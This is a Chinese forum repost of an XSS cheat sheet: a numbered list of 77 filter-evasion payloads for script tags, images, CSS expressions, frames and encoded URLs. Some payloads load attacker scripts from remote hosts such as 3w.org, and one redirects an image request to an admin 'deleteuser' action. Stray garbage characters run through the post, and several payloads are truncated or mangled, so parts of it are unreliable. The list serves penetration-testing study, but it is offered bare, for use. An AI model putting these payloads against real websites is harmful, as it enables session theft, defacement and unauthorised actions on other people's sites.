貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
) }0 J4 n$ P$ p% `
# v; a9 J) _0 D; y: V) M (1)普通的XSS JavaScript注入' u! W. g+ m ?8 Y2 r w4 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 G6 j6 i, l! C+ `1 w! Y2 }6 Z/ \8 H( E+ i
(2)IMG标签XSS使用JavaScript命令
# S7 k" s B% U0 C3 j7 U <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' n$ {1 _: W) V8 @$ ]# d9 z
& R" N. |) D$ F( J% ~1 X
(3)IMG标签无分号无引号
& E8 n6 d7 e/ b7 M+ z <IMG SRC=javascript:alert(‘XSS’)>+ O) z" }$ i8 @( N. K! y Y; a* r
7 a0 x3 f+ a. I (4)IMG标签大小写不敏感: x) I' j, I k! m3 [8 F' p) a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>5 g- w3 K8 B; @0 k/ ~2 f
. c' c* l k+ o. p! C5 s (5)HTML编码(必须有分号)
$ x7 ?9 l; p, C& h X <IMG SRC=javascript:alert(“XSS”)>" s0 y7 I, n; p0 M: k
' R: U5 |1 ~0 Q! T
(6)修正缺陷IMG标签
% A/ Y* r+ A: w3 G0 Z) i' g- @) u, a' ~, u <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 y. f$ ]( S* a5 U6 ?* H- A* \7 d: P
(7)formCharCode标签(计算器)
( M6 U1 ]/ n" x2 a+ Y6 n, {+ Z <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 U- T4 U5 h5 T4 {) m5 T
( a. E5 {' T. _) |( ]9 D3 \
(8)UTF-8的Unicode编码(计算器)
# j$ X' O2 \9 e5 f9 q! g) u <IMG SRC=jav..省略..S')>
' p+ l3 g5 D/ u+ P3 j
" ^! J" g7 p6 d% {1 n (9)7位的UTF-8的Unicode编码是没有分号的(计算器)% C8 V' l8 I1 e! y4 D
<IMG SRC=jav..省略..S')>+ C: R: f$ O, o9 g. q) y
$ M. L( B8 D, `$ q) J/ L/ U% G
(10)十六进制编码也是没有分号(计算器)
- n& J7 a F' B <IMG SRC=java..省略..XSS')>$ b' A R4 I e4 y9 |
# V- Q0 H# Y6 m# Q" e (11)嵌入式标签,将Javascript分开$ c2 w8 E) s3 L/ [' {: b( T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 c% Z( L( u5 C# J0 O
5 C* L2 J" `# _ (12)嵌入式编码标签,将Javascript分开
7 M8 z! ^5 d+ g- p! Z <IMG SRC=”jav ascript:alert(‘XSS’);”>
$ m1 U1 E, u4 ]2 E- s" Q+ T* \5 @+ }: y7 v/ f8 S
(13)嵌入式换行符( v1 X4 m9 @4 M& l" i9 m$ }
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 a; Y4 i! ?* r! C A- L3 L! b9 G$ z" Q3 M" F# h) l
(14)嵌入式回车& g2 u, N9 T' X, Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 M# ]0 h3 G3 `$ o* p2 f
6 ]3 K2 Q" ]6 N+ y6 V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; Q# V) B1 \! S; {, K
<IMG SRC=”javascript:alert(‘XSS‘)”>$ E/ C' B+ R# f
$ Q2 m( j0 `# V (16)解决限制字符(要求同页面)
( I( x, a: _1 j7 P <script>z=’document.’</script>
9 X% M( F9 s K/ m* X5 e) ?5 b* K/ ` <script>z=z+’write(“‘</script>! P o- @3 h! y) V9 Q/ [
<script>z=z+’<script’</script>
7 {/ Y. l; ^6 Y <script>z=z+’ src=ht’</script>1 O. [$ m6 v$ R8 z
<script>z=z+’tp://ww’</script>
/ U. j# \8 B5 s% Z; _ <script>z=z+’w.shell’</script>
3 U1 u9 W. n% t& J6 F! Z' J* [ <script>z=z+’.net/1.’</script>2 Z/ ?7 [6 n8 e1 d( `. Y. e
<script>z=z+’js></sc’</script>
+ ]. G% i, w3 ?; `" ^7 u) P <script>z=z+’ript>”)’</script>
A3 p( L% u; i5 W+ g" Q$ @! w) \ <script>eval_r(z)</script>
/ C( D0 ]0 ^# |0 C: A: \/ B A O: U' A1 Y/ I$ `7 @
(17)空字符
3 w! g9 U f3 _- {9 O5 A4 j perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 A4 k- y4 k1 U8 X% |
- |" ?& p- I) |2 ]% Y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 n5 t6 I1 u) K3 @9 x
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 |- T. m/ i" C
+ g, o5 n# q& ~+ Y6 V (19)Spaces和meta前的IMG标签
/ `/ P( B$ V S; g6 y v9 c3 T& h, x4 W <IMG SRC=” � javascript:alert(‘XSS’);”>
. _& ~2 V$ u, Y/ g
! f, P2 ^' o! l3 u (20)Non-alpha-non-digit XSS
, ]5 O/ b: p2 |8 l U! s/ v <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 X& X. q# k) s* j9 k
9 z2 x) T. a& b1 `9 O2 o (21)Non-alpha-non-digit XSS to 2. `" A; j- H7 e1 F+ U* V
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 Y' Y+ v; @- s- y0 ~, U8 x
" s' V" @, ]3 ?% A! a9 X( N* c (22)Non-alpha-non-digit XSS to 3
- o' o5 P# b. u! g% @8 \/ } <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 M1 H3 @3 b& [1 }
. @1 S6 l" V2 W# Z% v (23)双开括号* D) B c- s8 l$ h& O+ ?& _4 b
<<SCRIPT>alert(“XSS”);//<</SCRIPT>, M: b; H9 H8 \& j1 r
$ U* P3 ~2 d& U; B
(24)无结束脚本标记(仅火狐等浏览器)
( j, {# L; n( F% ]/ i, A. \ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
D8 l. q5 Z4 T. o, R8 i1 _, p& z( t0 V
(25)无结束脚本标记2
. J2 W i; `, ~ <SCRIPT SRC=//3w.org/XSS/xss.js>
8 n4 ~7 q a( |0 p2 F! |5 P& H, M/ Y; r2 X& J4 U q2 h; V
(26)半开的HTML/JavaScript XSS' ^4 u: O+ x: w7 R; a
<IMG SRC=”javascript:alert(‘XSS’)”) j7 y: n2 N% p1 q
7 N$ ^. y2 W1 a' i6 Q" T$ b8 H5 d (27)双开角括号$ y0 ?& `0 K* o2 G* D
<iframe src=http://3w.org/XSS.html <
+ O) }' w" Q% _4 s8 w! ]2 E2 W5 x7 T1 }5 L! ?( N5 Q
(28)无单引号 双引号 分号
" `8 B' \& f% f- E+ P* A <SCRIPT>a=/XSS/8 N2 g7 F& V9 w. \4 [
alert(a.source)</SCRIPT>' B. e( q: i; q
2 g7 A7 h( S' N" i" R (29)换码过滤的JavaScript z' A% W! D. T! Y! o
\”;alert(‘XSS’);//$ G3 b6 s I$ N
, \& Y! {) r" b" D' G
(30)结束Title标签4 T+ H5 J T$ o( p
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% h6 ^% `+ s/ U; o
( \, k9 S( n6 N% h* N
(31)Input Image
7 j6 W' `2 E- u, E( ~7 p2 j8 a3 b <INPUT SRC=”javascript:alert(‘XSS’);”>
- V: ]! K+ w6 _: a* O, w
# C0 X! ~% E: [3 x4 t (32)BODY Image
4 {4 N* T8 ~, T <BODY BACKGROUND=”javascript:alert(‘XSS’)”>* d9 z) S. _( }0 x& H+ T- ~" ^. h& p
0 {4 }1 {4 b" y( \
(33)BODY标签3 {- |* ^5 t$ q5 C5 X1 C
<BODY(‘XSS’)>1 m$ b4 H# ]" C8 {8 b
! m9 k! S' U' X5 [# \1 {3 B- [# p$ T
(34)IMG Dynsrc/ A' B/ q, y3 V9 ^$ \
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! x9 P/ \8 K$ k: u
' G+ ~5 v: H- T z (35)IMG Lowsrc5 Q b+ ~+ G# H2 u% q
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
8 g/ r, Y i' N. Z& \* X. L
1 j) y W, ^0 W (36)BGSOUND
6 ^) [' \% m0 x- M0 S. P$ _* R+ x <BGSOUND SRC=”javascript:alert(‘XSS’);”>
* W. t. D1 K, p/ ?. D" {- T0 Q% e
(37)STYLE sheet
& u5 Q# k, L) z5 y: a/ O <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>$ g# h+ x$ n1 t$ F
$ ~; {0 d% s3 o( w
(38)远程样式表
( k1 m0 F9 u' a& K <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ i% E' l6 y- v' }( t# `- R2 u& j
/ V7 s0 M2 r' I/ K6 A (39)List-style-image(列表式)) _3 T) t7 T/ z" _
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
B% p, Y4 g; q% g2 j# R& M( P7 O
(40)IMG VBscript% g8 G3 J: j/ ^" o5 a$ a: }. A7 Z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
3 z+ O4 F r' M# b1 Z b) N5 v; j5 [( ?1 S' G3 `/ {! k, I
(41)META链接url! N: n! Z& P( h. ?- `6 }5 V/ a
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
$ {' B; A2 c3 L3 E
" G/ K; b& U E+ ]- B (42)Iframe
( w; `0 N/ e( g5 B9 u+ Z <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 _5 ~ z t! Y. x( D7 I1 G' Z J; f) e0 i
(43)Frame5 D, l( T: L- X8 y
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
0 ^6 z9 V5 |2 f$ z( i' k' \: g8 a! z/ h; P2 F/ ]
(44)Table6 ?0 Q4 c) L8 t7 S& M3 f0 D
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># F R) ^; j$ h4 h' g7 z! p1 D, U, O
$ s: Z; R4 F' x6 n5 |6 s! z
(45)TD
6 O/ a1 s1 P- D [. h# U' T! ?0 ]- n <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># t. K- i" H; @( i+ }
0 s* O, Y. x6 p! V (46)DIV background-image
; y; H# h/ d7 Y% n4 }' N <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. s1 ]% P" s# W$ f* z; K# s* i
; L6 R0 x: g' k4 L (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& p5 v; `9 b2 B" A8 J
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
8 I5 E' d& S2 X9 [$ Z) j. i% z F# {/ c2 l( o
(48)DIV expression9 j* V3 q3 t P/ o/ h3 U3 U
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>2 T6 k6 u! @! W9 S6 R$ Y9 B
* {0 w. v6 _* K: n9 E: O1 h. G (49)STYLE属性分拆表达# ?1 I: J, Z8 t
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
4 Z, H7 H! E/ c. q3 K& p# ~
5 u6 F h* _0 l7 }! E (50)匿名STYLE(组成:开角号和一个字母开头)
3 x( O- [0 Y( h5 F l2 g) c <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ m Z* R8 v y0 n$ N
$ _- E, u, e+ i( r3 U
(51)STYLE background-image
( d( _5 ?7 y+ w3 k' J: | <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: ~5 [: @( N3 [$ u3 \7 i
3 T4 |4 `% ~/ h7 a( {& f X" U (52)IMG STYLE方式% S9 s2 g- q( E& a
exppression(alert(“XSS”))’>% l7 P& [; y5 R7 T* K
$ I$ W& U% H" e (53)STYLE background4 P$ i+ K$ \3 g& D
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 S: F7 _# L/ K! U) {2 I
: v, e8 V" Z5 q* B; r+ x (54)BASE7 `4 i6 K, n* y
<BASE HREF=”javascript:alert(‘XSS’);//”>
; Q& t7 z3 Y5 A0 p4 ^, k+ e
& A8 F; ~# U5 ^ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS0 e# D8 q/ r5 C- u
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 {( W- E: r4 W- A
$ ?4 F! y( y6 N0 {6 p (56)在flash中使用ActionScrpt可以混进你XSS的代码& w+ X# `/ m/ V; ^, d# |, `1 w
a=”get”;/ [/ B( t9 B1 Y8 v$ b
b=”URL(\”";: ~; h/ J9 X. y1 m
c=”javascript:”;
( H, Y! x" H: R! X9 c d=”alert(‘XSS’);\”)”;. f' g- ?3 H4 ?8 `5 ^
eval_r(a+b+c+d);- `- n0 J- o' c! b+ K( A4 G
8 m5 g+ A8 Y8 R$ \
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上+ Z0 E6 y) u/ |6 c# `5 B( R6 R
<HTML xmlns:xss>
: q& x# \, `7 x8 U <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>8 X s/ E3 _5 o" I2 p+ ]5 h% i
<xss:xss>XSS</xss:xss>
( z$ G6 H& E; g9 K6 a0 q$ F$ K </HTML>8 F# U3 V& l$ x; U. h' _
q2 r. M M; b5 P- K
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用) q0 h5 U6 _% `2 ^1 a# ]
<SCRIPT SRC=””></SCRIPT>
) O3 j1 q2 ^- M5 N* s; I4 O- O) N! A. L3 q2 K
(59)IMG嵌入式命令,可执行任意命令( V! v: j. W. M: l- O
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# d1 e% R% c5 e( i% }9 X+ t
0 R1 v- P, B" b! ~ (60)IMG嵌入式命令(a.jpg在同服务器) W6 z& c6 w& k: }7 i% K8 s+ h
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
8 j$ h$ z9 D" L5 j' R: N
( f# r5 U% o- M, @: J* L (61)绕符号过滤; f/ C; u* c( i1 A7 G c X
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) ~/ V" T: r+ {$ e
4 h' O+ _) `8 P2 h8 T9 F5 ]0 a/ o
(62)8 c$ K$ D" O$ Q: D, u
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 x4 ?2 O0 Z# I1 O+ ?: D# B# T
( E7 J$ z: v% `: y5 N! P (63)
. {0 I9 P, F% P3 X( T1 ] <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ l6 S3 C, D( E- a7 `
/ j' P5 ]( P1 i
(64)1 c9 n: b3 ~0 Q' I( G6 I! B
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>, y2 p' T! W% R6 P2 w* F$ k
5 S6 i; f1 \& D' N$ C (65)' |) b7 I, a( m" \ l. c
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> S `/ m8 N1 K6 H
( Q$ l2 g8 X* S" c4 T; z (66)5 C- b! F- X7 j1 i3 ?) Y& g
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ J) h3 F/ A. Y- M1 D2 w" d8 H& O2 `
(67)9 M! O/ e3 n* u' f& `( h: p. `
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>; j- m( C: r$ |. l. E* s) j) d5 D
l, w, _9 X3 A! Z0 E0 | (68)URL绕行+ S% z7 a% }! ~) h
<A HREF=”http://127.0.0.1/”>XSS</A>5 H5 ^: i1 H \9 ~
& ?% i: N3 r3 b0 r/ I5 N; I (69)URL编码7 d' v$ a5 `% V7 T: U1 H
<A HREF=”http://3w.org”>XSS</A>
, {& X% V% K. r E7 _( Q$ X
' y* F8 Z4 c, D9 n (70)IP十进制9 J' r m7 ^: a0 g7 t" v
<A HREF=”http://3232235521″>XSS</A>
- s% b/ G6 D& } m+ J, D8 l
- `6 H4 |) P* k" `7 i (71)IP十六进制4 i3 b7 U$ X @1 ]7 [0 s
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>8 s2 S# U' W0 V# q0 j6 t7 i. W
. ^1 f- ?6 [" E, O$ g" y
(72)IP八进制
4 p- _" [) G$ J* g( {, k z- V7 ^ <A HREF=”http://0300.0250.0000.0001″>XSS</A>+ }0 M R3 @, i9 W* U, Q- l* R5 f
" O6 F7 j. Q4 U& ^' _ (73)混合编码- i. u7 r5 ?6 W9 l
<A HREF=”h9 R) u- c0 C( @6 m; F0 T! `5 i. J
tt p://6 6.000146.0×7.147/”">XSS</A>
5 M# S7 m9 j! D% p4 c$ j/ h2 v, t. F
(74)节省[http:]
$ j% y& ?/ ^$ d( h# N <A HREF=”//www.google.com/”>XSS</A>4 O9 K! p" @6 v; s0 _: v
$ o4 @/ W% Z6 s; I. Q
(75)节省[www]
+ J" o9 _) i! x1 [+ a& T$ {, X <A HREF=”http://google.com/”>XSS</A>
/ A% r! C$ f8 ^7 I a$ p% j2 m' T$ e* @9 e4 A0 g
(76)绝对点绝对DNS& z y. [% F" e* Z/ `
<A HREF=”http://www.google.com./”>XSS</A>
* \" \9 @5 \2 ?, ^/ ~9 U5 s
" U& z1 @; F8 ^ (77)javascript链接9 Q2 @* y6 K2 t9 A. r s
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对